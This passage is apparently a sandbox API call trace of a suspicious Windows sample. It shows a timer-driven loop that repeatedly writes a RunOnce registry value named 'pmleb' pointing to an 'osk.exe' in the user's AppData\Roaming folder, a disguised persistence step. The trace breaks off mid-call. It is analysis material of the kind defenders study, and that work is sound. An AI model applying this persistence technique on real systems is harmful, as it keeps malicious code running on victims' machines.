ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.147] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.147] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.147] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.147] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.147] RegCloseKey (hKey=0x280) returned 0x0 [0079.147] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.148] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.148] SetTimer (hWnd=0x20280, nIDEvent=0x2028, uElapse=0xa, lpTimerFunc=0x0) returned 0x2028 [0079.148] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.160] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.160] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.160] KillTimer (hWnd=0x20280, uIDEvent=0x2028) returned 1 [0079.160] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.160] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.160] IUnknown:Release (This=0x787518) returned 0x1 [0079.161] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.161] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.161] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.161] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.161] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.161] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.161] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.161] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.161] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.161] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x29 [0079.161] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.161] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x2a [0079.161] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.162] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x29 [0079.162] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.162] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.162] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.162] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.162] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.162] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.162] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.162] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.162] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.163] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.163] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.163] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.163] RegCloseKey (hKey=0x280) returned 0x0 [0079.163] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.163] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.163] SetTimer (hWnd=0x20280, nIDEvent=0x2029, uElapse=0xa, lpTimerFunc=0x0) returned 0x2029 [0079.163] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.175] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.175] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.176] KillTimer (hWnd=0x20280, uIDEvent=0x2029) returned 1 [0079.176] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.176] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.176] IUnknown:Release (This=0x787518) returned 0x1 [0079.176] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.176] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.176] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.176] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.176] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.176] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.177] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.177] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.177] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.177] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x2a [0079.177] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.177] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x2b [0079.177] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.178] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x2a [0079.178] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.178] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.178] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.178] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.178] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.178] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.178] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.178] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.178] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.179] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.179] RegCloseKey (hKey=0x280) returned 0x0 [0079.179] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.179] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.179] SetTimer (hWnd=0x20280, nIDEvent=0x202a, uElapse=0xa, lpTimerFunc=0x0) returned 0x202a [0079.179] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.192] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.192] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.192] KillTimer (hWnd=0x20280, uIDEvent=0x202a) returned 1 [0079.192] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.192] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.193] IUnknown:Release (This=0x787518) returned 0x1 [0079.193] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.193] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.193] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.193] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.193] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.193] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.193] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.193] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.193] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.193] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x2b [0079.193] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.193] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x2c [0079.194] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), 